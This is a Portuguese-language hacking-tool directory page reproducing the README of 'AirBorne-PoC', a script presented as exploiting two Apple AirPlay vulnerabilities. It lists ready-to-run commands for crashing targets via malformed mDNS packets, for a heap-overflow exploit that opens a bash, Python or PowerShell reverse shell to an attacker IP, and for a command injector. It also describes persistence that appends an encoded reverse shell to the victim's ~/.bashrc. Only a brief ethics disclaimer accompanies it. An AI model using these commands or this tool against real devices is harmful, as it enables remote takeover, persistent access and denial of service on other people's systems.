Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
AirBorne-PoC — poc para CVE-2025-24252 & CVE-2025-24132 | Kitploit
Ferramentas/GitHubGitHub/ekomssavior/airborne-poc
Mecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoShellcodePós-ExploraçãoComando e ControleFerramenta de Acesso RemotoDesenvolvimento de PayloadsExploração de Binários
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc para CVE-2025-24252 & CVE-2025-24132

16427há 7 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

AirBorne PoC Framework – Edição RCE de Elite

Framework PoC completo para CVE-2025-24252 e CVE-2025-24132
Por ekomsSavior |

AirBorne é um framework de prova de conceito (PoC) combinado que visa duas vulnerabilidades graves no serviço AirPlay da Apple. Ele inclui um gatilho de crash completo e um exploit de reverse shell funcional com persistência opcional, listener e múltiplos formatos de payload — tudo em um único script.

Procurando pela versão original?
A edição legada ainda está disponível no branch legacy deste repositório.
Para fazer o checkout:

root@kitploit:~
git checkout legacy

CVEs Abordados

CVE-2025-24252 – Crash do Registro TXT mDNS

  • Aciona um crash no daemon AirPlayReceiver por meio de um pacote mDNS malformado
  • Funciona via broadcast UDP na porta 5353

CVE-2025-24132 – Heap Overflow → Reverse Shell (RCE)

  • Aciona um estouro de heap (heap overflow) no serviço TCP do AirPlay na porta 7000
  • Suporta payloads de reverse shell em bash, python e PowerShell
  • Inclui persistência opcional usando injeção em .bashrc (Linux)

Primeiros Passos

1. Clone o Repositório

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. Instale as Dependências

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

Visão Geral da Execução

O único script airborne.py inclui ambos os PoCs e toda a lógica:

  • Selecione uma CVE usando --exploit
  • Defina um payload de reverse shell usando --payload
  • Inicia automaticamente um listener netcat para você
  • Opcionalmente, ativa a persistência no alvo usando --persistent

Exemplos de Uso

Provocar Crash no Alvo com Pacote mDNS (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

Requer uma interface em modo monitor.


Executar Heap Overflow → RCE (CVE-2025-24132)

Inicie o exploit completo com o shell bash padrão:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

Escolha o shell Python em vez disso:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Ative a persistência real em alvos Linux:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

Apenas injeção de comando shell

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

Opções de Payload

PayloadDescrição
bashReverse shell bash padrão via TCP
pythonReverse shell baseado em Python usando socket e pty

Modo de Persistência

Ao usar --persistent, o script anexará o payload de reverse shell codificado ao arquivo do alvo:

root@kitploit:~
~/.bashrc

Isso garante que um shell seja devolvido a você toda vez que o usuário fizer login ou um terminal for iniciado.


Notas de Manutenção

  • Reverse shells são codificados usando base64 e enviados após o estouro de buffer (buffer overflow)
  • Todos os payloads são enviados pela porta 7000
  • Pacotes mDNS são enviados via UDP 5353 e exigem permissão de socket bruto (raw socket)
  • Certifique-se de que o IP da sua máquina de ataque seja acessível pelo dispositivo alvo
  • O script lida com casos básicos de erro e falha silenciosamente se as portas estiverem fechadas

Aviso Ético

Este projeto destina-se apenas a fins educacionais, éticos e de pesquisa autorizada.

  • Você deve ter permissão explícita para testar o sistema alvo.
  • Você assume total responsabilidade por quaisquer ações realizadas.

A exploração não autorizada de sistemas é ilegal e antiética.


Créditos

  • Criado por ekomsSavior
  • Inspirado por CVEs reais e pesquisas de desenvolvimento de exploits
Baixar ferramenta
powershell
Payload RCE completo em Windows PowerShell (ofuscado)